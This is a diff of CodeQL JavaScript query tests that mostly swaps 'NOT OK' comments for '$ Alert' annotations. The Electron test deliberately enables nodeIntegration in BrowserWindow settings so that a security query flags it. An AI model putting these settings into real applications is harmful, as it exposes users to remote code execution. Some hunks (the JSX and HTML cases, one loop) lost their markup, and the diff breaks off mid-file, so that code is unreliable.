a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js index 9ba55169e39d..11f6763cf3f5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js @@ -1,5 +1,5 @@ (function() { - var React = require("probably-react"); // NOT OK + var React = require("probably-react"); // $ Alert }) (function() { (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts index 07f817e287a8..5791afc6ed5c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts @@ -1,4 +1,4 @@ -import { Foo, Bar, Baz } from "somewhere"; // OK +import { Foo, Bar, Baz } from "somewhere"; export function f(this: Foo) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts index 8b157c18f8df..07c3bb0c50dc 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts @@ -1,6 +1,6 @@ -import { SomeInterface } from 'somwhere1'; // OK -import { AnotherInterface } from 'somwhere2'; // OK -import { foo } from 'somewhere3'; // OK +import { SomeInterface } from 'somwhere1'; +import { AnotherInterface } from 'somwhere2'; +import { foo } from 'somewhere3'; let x = "world"; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts index 3a4c417daec3..5c5085a37285 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts @@ -1,12 +1,12 @@ -import fs = require('fs') // OK -import http = require('http') // OK +import fs = require('fs') +import http = require('http') export var mockFs : typeof fs = {} export var mockRequest : typeof http.ServerRequest = {} export function f() { - let x = 4 // OK - let y = 5 // NOT OK + let x = 4 + let y = 5 // $ Alert var t : typeof x = 20 return t } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts index 130a2a1db926..62a86545a4e0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts @@ -1 +1 @@ -declare class UnusedClass {} // OK +declare class UnusedClass {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js index 75eade9c6f82..e25cb72b32a5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js @@ -1,10 +1,10 @@ function f(a) { - const [a, // OK: used - _, // OK: starts with underscore - _c, // OK: starts with underscore - d, // OK: used - e, // NOT OK - f] // NOT OK + const [a, // OK - used + _, // OK - starts with underscore + _c, // OK - starts with underscore + d, // OK - used + e, // $ Alert + f] // $ Alert = a; return a + d; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts index 14ec99e02b5c..a04efbed8e1c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts @@ -1,6 +1,6 @@ -import T from 'somewhere'; // NOT OK: `T` is unused (it is shadowed by another T) -import object from 'somewhere'; // NOT OK: `object` is unused (it is "shadowed" by a keyword) -import * as N from 'somewhere'; // OK: N is a namespace and thus not shadowed by 'interface N'. +import T from 'somewhere'; // $ Alert - `T` is unused (it is shadowed by another T) +import object from 'somewhere'; // $ Alert - `object` is unused (it is "shadowed" by a keyword) +import * as N from 'somewhere'; // OK - N is a namespace and thus not shadowed by 'interface N'. { var x: T = {}; diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index 5e1d0e95fb43..7cc8b5e4d5fb 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -1,7 +1,7 @@ const {BrowserWindow} = require('electron') function test() { - var unsafe_1 = { // NOT OK, both enabled + var unsafe_1 = { // $ Alert - both enabled webPreferences: { nodeIntegration: true, nodeIntegrationInWorker: true, @@ -11,7 +11,7 @@ function test() { } }; - var options_1 = { // NOT OK, `nodeIntegrationInWorker` enabled + var options_1 = { // $ Alert - `nodeIntegrationInWorker` enabled webPreferences: { plugins: true, nodeIntegrationInWorker: false, @@ -20,13 +20,13 @@ function test() { } }; - var pref = { // NOT OK, implicitly enabled + var pref = { // $ Alert - implicitly enabled plugins: true, webSecurity: true, sandbox: true }; - var options_2 = { // NOT OK, implicitly enabled + var options_2 = { // $ Alert - implicitly enabled webPreferences: pref, show: true, frame: true, @@ -34,7 +34,7 @@ function test() { minHeight: 300 }; - var safe_used = { // NOT OK, explicitly disabled + var safe_used = { // $ Alert - explicitly disabled webPreferences: { nodeIntegration: false, plugins: true, @@ -46,7 +46,7 @@ function test() { var w1 = new BrowserWindow(unsafe_1); var w2 = new BrowserWindow(options_1); var w3 = new BrowserWindow(safe_used); - var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // NOT OK, `nodeIntegration` enabled + var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // $ Alert - `nodeIntegration` enabled var w5 = new BrowserWindow(options_2); var w6 = new BrowserWindow(safe_used); } diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js index 3006b9d28826..4ee166b91873 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js @@ -6,18 +6,16 @@ console.log(bitIsSet(-1, 31)); // prints 'false' (x & 3) > 0; // this is fine -// OK + x = -1; console.log((x | 0) > (0)); // prints 'false' -// NOT OK -console.log((x >>> 0) > 0); // prints 'true' +console.log((x >>> 0) > 0); // prints 'true' // $ Alert + -// OK console.log((x << 16 >> 16) > 0); // prints 'false' -// OK + (x & 256) > 0; -// NOT OK -(x & 0x100000000) > 0; \ No newline at end of file +(x & 0x100000000) > 0; // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js index e6b2568239f0..82c34116c62e 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js @@ -12,34 +12,33 @@ Rectangle.prototype.contains = function(x, y) { y < this.y+this.height); }; -// OK + "true" == true; -// OK + f() != f(23); -// NOT OK -(function() { }) == (function() {}); +(function() { }) == (function() {}); // $ Alert + - // OK x === y; -// OK + true === false; -// OK + function isNan(n) { return n !== n; } -// OK + function checkNaN(x) { if (x === x) // check whether x is NaN return false; return true; } -// OK (though wrong in other ways) +// OK - though wrong in other ways function same(x, y) { if (x === y) return true; diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js index 3bf5add29910..aa9e955fdd08 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js @@ -1,12 +1,12 @@ var duplicate = { - "key": "value", // NOT OK: duplicated on line 5 + "key": "value", // $ Alert - duplicated on line 5 " key": "value", - "1": "value", // NOT OK: duplicated on line 11 - "key": "value", // NOT OK: duplicated on next line - 'key': "value", // NOT OK: duplicated on next line - key: "value", // NOT OK: duplicated on next line - \u006bey: "value", // NOT OK: duplicated on next line - "\u006bey": "value", // NOT OK: duplicated on next line + "1": "value", // $ Alert - duplicated on line 11 + "key": "value", // $ Alert - duplicated on next line + 'key': "value", // $ Alert - duplicated on next line + key: "value", // $ Alert - duplicated on next line + \u006bey: "value", // $ Alert - duplicated on next line + "\u006bey": "value", // $ Alert - duplicated on next line "\x6bey": "value", 1: "value" }; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js index f543395bc87c..07a81208a4ce 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js @@ -1,6 +1,6 @@ function* foo(){ var index = 0; while(index <= 2) - // OK + yield index++; } diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js index 2bb1d46c4062..6b5b599f4b00 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js @@ -20,7 +20,7 @@ var myComplicatedPropertyDescriptor = (function(k) { })("get"); Object.defineProperty(Object.prototype, 'foo', myComplicatedPropertyDescriptor); -// OK: getters +// OK - getters (false).should.be.ok; (false).should; should.prototype.be; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js index a665423bd815..36bf5253ebdf 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js @@ -19,7 +19,7 @@ function try2(x) { function try3(x) { try { x.ordinaryProperty() - x.ordinaryProperty // NOT OK + x.ordinaryProperty // $ Alert return x; } catch (e) { return false; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js index e58a785b5aac..11fde389f858 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js @@ -1,83 +1,82 @@ -'use strict'; // OK -'use struct'; // OK (flagged by UnknownDirective.ql) -23; // NOT OK -void(23); // OK -23, foo(); // NOT OK -foo(23, 42); // OK -foo((23, bar())); // NOT OK -foo((bar(), 23)); // OK -1,f(); // NOT OK - -// OK +'use strict'; +'use struct'; // OK - flagged by UnknownDirective.ql +23; // $ Alert +void(23); +23, foo(); // $ Alert +foo(23, 42); +foo((23, bar())); // $ Alert +foo((bar(), 23)); +1,f(); // $ Alert + + /** * @type {function(int) : string} */ String.prototype.slice; -// OK + /** @typedef {(string|number)} */ goog.NumberLike; -// NOT OK -/** Useless */ +/** Useless */ // $ Alert x; -// OK (magic DOM property) +// OK - magic DOM property elt.clientTop; -// OK (xUnit fixture) +// OK - xUnit fixture [Fixture] function tst() {} -// OK: bad style, but most likely intentional +// OK - bad style, but most likely intentional (0, o.m)(); (0, o["m"])(); function tst() { - // OK: bad style, but most likely intentional + // OK - bad style, but most likely intentional (0, eval)("42"); } function f() { var x; - "foo"; // NOT OK + "foo"; // $ Alert } try { doSomethingDangerous(); } catch(e) { - new Error("Told you so"); // NOT OK - new SyntaxError("Why didn't you listen to me?"); // NOT OK - new Error(computeSnarkyMessage(e)); // NOT OK - new UnknownError(); // OK + new Error("Told you so"); // $ Alert + new SyntaxError("Why didn't you listen to me?"); // $ Alert + new Error(computeSnarkyMessage(e)); // $ Alert + new UnknownError(); } function g() { var o = {}; Object.defineProperty(o, "trivialGetter1", { get: function(){} }); - o.trivialGetter1; // OK + o.trivialGetter1; Object.defineProperty(o, "trivialNonGetter1", "foo"); - o.trivialNonGetter1; // NOT OK + o.trivialNonGetter1; // $ Alert var getterDef1 = { get: function(){} }; Object.defineProperty(o, "nonTrivialGetter1", getterDef1); - o.nonTrivialGetter1; // OK + o.nonTrivialGetter1; var getterDef2 = { }; unknownPrepareGetter(getterDef2); Object.defineProperty(o, "nonTrivialNonGetter1", getterDef2); - o.nonTrivialNonGetter1; // OK + o.nonTrivialNonGetter1; Object.defineProperty(o, "nonTrivialGetter2", unknownGetterDef()); - o.nonTrivialGetter2; // OK + o.nonTrivialGetter2; - (o: empty); // OK + (o: empty); - testSomeCondition() ? o : // NOT OK + testSomeCondition() ? o : // $ Alert doSomethingDangerous(); - consume(testSomeCondition() ? o : // OK + consume(testSomeCondition() ? o : doSomethingDangerous()); }; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js index 62f64f2f729a..0e66a95c166e 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js @@ -1,4 +1,3 @@ function tst2(eval) { - // NOT OK - (0, eval)("42"); + (0, eval)("42"); // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js index f500d4cdafce..a3b6b1fea45e 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js @@ -1,137 +1,128 @@ -// NOT OK -if (typeof window !== undefined) +if (typeof window !== undefined) // $ Alert console.log("browser"); -// OK + if (typeof window === "undefined") console.log("not a browser"); -// NOT OK -if ("Hello, world".indexOf("Hello" >= 0)) +if ("Hello, world".indexOf("Hello" >= 0)) // $ Alert console.log("It's in there."); -// OK + true < 1; -// OK + undefined == null; -// NOT OK -null == 0; +null == 0; // $ Alert -// NOT OK -switch ("hi") { +switch ("hi") { // $ Alert case 42: } -// NOT OK -Object.toString() + "!" == undefined; +Object.toString() + "!" == undefined; // $ Alert -// NOT OK -(+f() || !g() || (h() + k())) == undefined; +(+f() || !g() || (h() + k())) == undefined; // $ Alert -// NOT OK -if (!Module['load'] == 'undefined') { +if (!Module['load'] == 'undefined') { // $ Alert } function f(x) { return true; - // OK + return x === 42; } function g() { var number = 0; // number - // OK + number == "0"; - // NO OK - number == "zero"; + + number == "zero"; // $ Alert } -// NOT OK -0 < (Math.random() > 0.5 ? void 0 : [1, 2]); +0 < (Math.random() > 0.5 ? void 0 : [1, 2]); // $ Alert + -// OK '100' < 1000; -// OK (fvsvo "OK") +// OK - fvsvo "OK" 100 > ''; -// OK + new Date('foo') == 'Invalid Date'; -// OK + new String('bar') == 'bar'; -// OK + ({ valueOf: () => true } == true); -// OK + ({ valueOf: () => 42 } == 42); -// OK + ({ valueOf: () => 'hi' } == 'hi'); -// OK + ({ valueOf: () => null } == null); -// NOT OK, but not currently flagged since we conservatively -// assume that `new Date(123)` could return any object, not necessarily a Date +// assume that `new Date(123)` could return any object, not necessarily a Date // $ Alert - but not currently flagged since we conservatively new Date(123) == 123 function f(x1, x2, x3, x4, x5, x6){ - typeof x1 === 'object' && x1 !== null; // OK + typeof x1 === 'object' && x1 !== null; if (!x2) { x2 = new Error(); } - typeof x2 === 'object' && x2 !== null; // NOT OK: x2 cannot be null here + typeof x2 === 'object' && x2 !== null; // $ Alert - x2 cannot be null here if (x3) { - typeof x3 === 'object' && x3 !== null; // NOT OK: x3 cannot be null here + typeof x3 === 'object' && x3 !== null; // $ Alert - x3 cannot be null here } if (!x4) { - typeof x4 === 'object' && x4 !== null; // OK + typeof x4 === 'object' && x4 !== null; } if (!x5) { x5 = new Error(); } - x5 !== null; // NOT OK: x2 cannot be null here + x5 !== null; // $ Alert - x2 cannot be null here if (x6) { - x6 !== null; // NOT OK: x3 cannot be null here + x6 !== null; // $ Alert - x3 cannot be null here } } function g() { var o = {}; - o < "def"; // NOT OK + o < "def"; // $ Alert var p = { toString() { return "abc"; } }; - p < "def"; // OK + p < "def"; function A() {} var a = new A(); - a < "def"; // NOT OK + a < "def"; // $ Alert function B() {}; B.prototype = p; var b = new B(); - b < "def"; // OK + b < "def"; function C() { this.valueOf = function() { return 42; }; } var c = new C(); - c != 23; // OK + c != 23; null.valueOf = function() { return 42; }; - null == 42; // NOT OK + null == 42; // $ Alert true.valueOf = function() { return "foo" }; - true != "bar"; // NOT OK + true != "bar"; // $ Alert } @@ -139,54 +130,54 @@ function h() { var a = 42; var b = "42"; - a === "42"; // NOT OK - 42 === b // NOT OK - a === b; // NOT OK + a === "42"; // $ Alert + 42 === b // $ Alert + a === b; // $ Alert } function i() { "foo" === undefined - undefined === "foo" // NOT OK + undefined === "foo" // $ Alert var NaN = 0; // trick analysis to consider warning about NaN, for the purpose of testing pretty printing - NaN === "foo" // NOT OK + NaN === "foo" // $ Alert var Infinity = 0; // trick analysis to consider warning about Infinity, for the purpose of testing pretty printing - Infinity === "foo" // NOT OK + Infinity === "foo" // $ Alert } function k() { // tests for pretty printing of many types var t1 = 42; - t1 !== null; // NOT OK - null !== t1; // NOT OK + t1 !== null; // $ Alert + null !== t1; // $ Alert var t2 = unknown? t1: "foo"; - t2 !== null; // NOT OK - null !== t2; // NOT OK + t2 !== null; // $ Alert + null !== t2; // $ Alert var t3 = unknown? t2: undefined; - t3 !== null; // NOT OK - null !== t3; // NOT OK + t3 !== null; // $ Alert + null !== t3; // $ Alert var t4 = unknown? t3: true; - t4 !== null; // NOT OK - null !== t4; // NOT OK + t4 !== null; // $ Alert + null !== t4; // $ Alert var t5 = unknown? t4: function(){}; - t5 !== null; // NOT OK - null !== t5; // NOT OK + t5 !== null; // $ Alert + null !== t5; // $ Alert var t6 = unknown? t5: /t/; - t6 !== null; // NOT OK - null !== t6; // NOT OK + t6 !== null; // $ Alert + null !== t6; // $ Alert var t7 = unknown? t6: {}; - t7 !== null; // NOT OK - null !== t7; // NOT OK + t7 !== null; // $ Alert + null !== t7; // $ Alert var t8 = unknown? t8: new Symbol(); - t8 !== null; // NOT OK - null !== t8; // NOT OK + t8 !== null; // $ Alert + null !== t8; // $ Alert } @@ -199,22 +190,22 @@ function l() { var t4 = unknown? 42: unknown? "foo": unknown? undefined: true; var t5 = unknown? t4: null - t2 !== t4; // NOT OK - t4 !== t2; // NOT OK - t3 !== t4; // NOT OK - t4 !== t3; // NOT OK + t2 !== t4; // $ Alert + t4 !== t2; // $ Alert + t3 !== t4; // $ Alert + t4 !== t3; // $ Alert - t2 !== t5; // NOT OK - t5 !== t2; // NOT OK - t3 !== t5; // NOT OK - t5 !== t3; // NOT OK + t2 !== t5; // $ Alert + t5 !== t2; // $ Alert + t3 !== t5; // $ Alert + t5 !== t3; // $ Alert } -1n == 1; // OK +1n == 1; (function tooGeneralLocalFunctions(){ function f1(x) { - if (x === "foo") { // OK, whitelisted + if (x === "foo") { // OK - whitelisted } } @@ -222,7 +213,7 @@ function l() { function f2(x, y) { var xy = o.q? x: y; - if (xy === "foo") { // NOT OK (not whitelisted like above) + if (xy === "foo") { // $ Alert - not whitelisted like above } } diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js index 811ef9c576c9..523535b640e5 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js @@ -1,41 +1,36 @@ -// NOT OK -!method in obj; +!method in obj; // $ Alert + -// OK !(method in obj); -// OK + '__proto__' in obj; -// OK + 0 in obj; -// OK + ('$' + key) in obj; -// NOT OK -p in null; +p in null; // $ Alert + +0 in 'string'; // $ Alert -// NOT OK -0 in 'string'; -// OK p in {}; -// NOT OK -console.log("Setting device's bluetooth name to '%s'" % device_name); +console.log("Setting device's bluetooth name to '%s'" % device_name); // $ Alert -// NOT OK -if (!callback || !callback instanceof Function) { +if (!callback || !callback instanceof Function) { // $ Alert ; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// OK + function cmp(x, y) { if (x > y) return 1; @@ -44,48 +39,42 @@ function cmp(x, y) { return 0; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// NOT OK -1 + void 0 +1 + void 0 // $ Alert + -// OK o[true] = 42; function f() { var x; - // NOT OK - x -= 2; + x -= 2; // $ Alert } function g() { var x = 19, y; - // NOT OK - x %= y; + x %= y; // $ Alert } function h() { var x; - // NOT OK - ++x; + ++x; // $ Alert } function k() { var name; - // NOT OK - return `Hello ${name}!`; + return `Hello ${name}!`; // $ Alert } function l() { var x; - // NOT OK - x ** 2; + x ** 2; // $ Alert } -1n + 1; // NOT OK, but not currently flagged +1n + 1; // $ MISSED: Alert (function(){ let sum = 0; @@ -114,10 +103,10 @@ function l() { function m() { var x = 19, y = "string"; - x %= y; // NOT OK - x += y; // OK - x ||= y; // OK - x &&= y; // OK - x ??= y; // OK - x >>>= y; // NOT OK + x %= y; // $ Alert + x += y; + x ||= y; + x &&= y; + x ??= y; + x >>>= y; // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts index 4362c11a8e67..5f1774f1ab56 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts @@ -1,5 +1,5 @@ declare let cache: { [x: string]: Promise }; function deleteCache(x: string) { - delete cache[x]; // OK + delete cache[x]; } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js index 10fc244dbc44..28e95513d401 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js @@ -5,24 +5,24 @@ async function getThing() { function useThing() { let thing = getThing(); - if (thing === undefined) {} // NOT OK + if (thing === undefined) {} // $ Alert - if (thing == null) {} // NOT OK + if (thing == null) {} // $ Alert - something(thing ? 1 : 2); // NOT OK + something(thing ? 1 : 2); // $ Alert - for (let x in thing) { // NOT OK + for (let x in thing) { // $ Alert something(x); } let obj = something(); - something(obj[thing]); // NOT OK - obj[thing] = 5; // NOT OK + something(obj[thing]); // $ Alert + obj[thing] = 5; // $ Alert - something(thing + "bar"); // NOT OK + something(thing + "bar"); // $ Alert if (something()) { - if (thing) { // NOT OK + if (thing) { // $ Alert something(3); } } @@ -31,21 +31,21 @@ function useThing() { async function useThingCorrectly() { let thing = await getThing(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // OK + return thing + "bar"; } async function useThingCorrectly2() { let thing = getThing(); - if (await thing === undefined) {} // OK + if (await thing === undefined) {} - if (await thing == null) {} // OK + if (await thing == null) {} - return thing + "bar"; // NOT OK + return thing + "bar"; // $ Alert } function getThingSync() { @@ -55,21 +55,21 @@ function getThingSync() { function useThingPossiblySync(b) { let thing = b ? getThing() : getThingSync(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // NOT OK - but we don't flag it + return thing + "bar"; // $ MISSED: Alert } function useThingInVoid() { - void getThing(); // OK + void getThing(); } function useThing() { if (random()) { - return getThing() ?? null; // NOT OK + return getThing() ?? null; // $ Alert } else { - return getThing?.() ?? null; // OK + return getThing?.() ?? null; } -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js index cbfe6d3250e5..d12e82cb8c24 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js +++ b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js @@ -1,6 +1,6 @@ function total(bad) { var sum = 0 - for (var i = 0; i < bad; ++i) { // NOT OK + for (var i = 0; i < bad; ++i) { // $ Alert sum += bad[i] } return sum @@ -8,7 +8,7 @@ function total(bad) { function total_good(good) { var sum = 0 - for (var i = 0; i < good.length; ++i) { // OK + for (var i = 0; i < good.length; ++i) { sum += good[i] } return sum @@ -17,21 +17,21 @@ function total_good(good) { var fruits = ["banana", "pineapple"] function mix() { var drink = [] - for (var i = 0; i < fruits; ++i) { // NOT OK + for (var i = 0; i < fruits; ++i) { // $ Alert drink.push(fruits[i]) } } function mix_good() { var drink = [] - for (var i = 0; i < fruits.length; ++i) { // OK + for (var i = 0; i < fruits.length; ++i) { drink.push(fruits[i]) } } function overloaded(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } else if (mode == "blar") { return foo[bar]; } else { @@ -41,7 +41,7 @@ function overloaded(mode, foo, bar) { function overloaded_no_else(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } if (mode == "blar") { return foo[bar]; @@ -50,7 +50,7 @@ function overloaded_no_else(mode, foo, bar) { function reassigned(index, object) { var tmp = object.getMaximum() - if (index < tmp) { // OK + if (index < tmp) { tmp = object.getArray() return tmp[index] } diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js index 101c6b360b48..5016873b6a59 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js @@ -1,43 +1,40 @@ // use of .length to prime the query a.length; -// NOT OK -for (var i=0; i -
    // OK +
    } @@ -24,20 +24,20 @@ class Component1 extends React.Component { render() { var unbound3 = this.unbound3; return
    -
    // NOT OK -
    // NOT OK -
    // NOT OK -
    // OK -
    // OK -
    // OK -
    // OK -
    this.unbound_butInvokedSafely(e)}/> // OK -
    // OK -
    // OK -
    // OK -
    // OK -
    // OK -
    // OK +
    // $ Alert +
    // $ Alert +
    // $ Alert +
    +
    +
    +
    +
    this.unbound_butInvokedSafely(e)}/> +
    +
    +
    +
    +
    +
    } @@ -125,7 +125,7 @@ class Component2 extends React.Component { render() { return
    -
    // OK +
    ; } @@ -139,7 +139,7 @@ class Component3 extends React.Component { render() { return
    -
    // OK +
    } @@ -159,7 +159,7 @@ class Component4 extends React.Component { render() { return
    -
    // OK +
    } @@ -177,7 +177,7 @@ class Component5 extends React.Component { render() { return
    -
    // OK +
    } diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js index 5490b0b4232a..9aa369d69b21 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js @@ -1,10 +1,10 @@ -x.f() & 0x0A != 0; // NOT OK -x.f() & (0x0A != 0); // OK -x.f() & 0x0A != 0; // OK -x.f() & 0x0A!=0; // OK +x.f() & 0x0A != 0; // $ Alert +x.f() & (0x0A != 0); +x.f() & 0x0A != 0; +x.f() & 0x0A!=0; -x !== y & 1; // NOT OK +x !== y & 1; // $ Alert -x > 0 & x < 10; // OK +x > 0 & x < 10; -a&b==c; // NOT OK +a&b==c; // $ Alert diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js index 800b7b08df2c..d39838870c81 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js @@ -1 +1 @@ -a&b==c; // OK (minified file) +a&b==c; // OK - minified file diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html index 87f969c3e179..03ac0651186e 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html @@ -1,6 +1,6 @@ - - - + + + diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js index 0645f8821a1d..f958714431d6 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js @@ -1,51 +1,51 @@ -"use foo"; // NOT OK -"use strict"; // NOT OK +"use foo"; // $ Alert +"use strict"; // $ Alert function bad() { - "'use strict'"; // NOT OK - "use strict;"; // NOT OK - "'use strict';"; // NOT OK - "'use strict;'"; // NOT OK - "use-strict"; // NOT OK - "use_strict"; // NOT OK - "uses strict"; // NOT OK - "use struct;" // NOT OK - "Use Strict"; // NOT OK - "use bar"; // NOT OK + "'use strict'"; // $ Alert + "use strict;"; // $ Alert + "'use strict';"; // $ Alert + "'use strict;'"; // $ Alert + "use-strict"; // $ Alert + "use_strict"; // $ Alert + "uses strict"; // 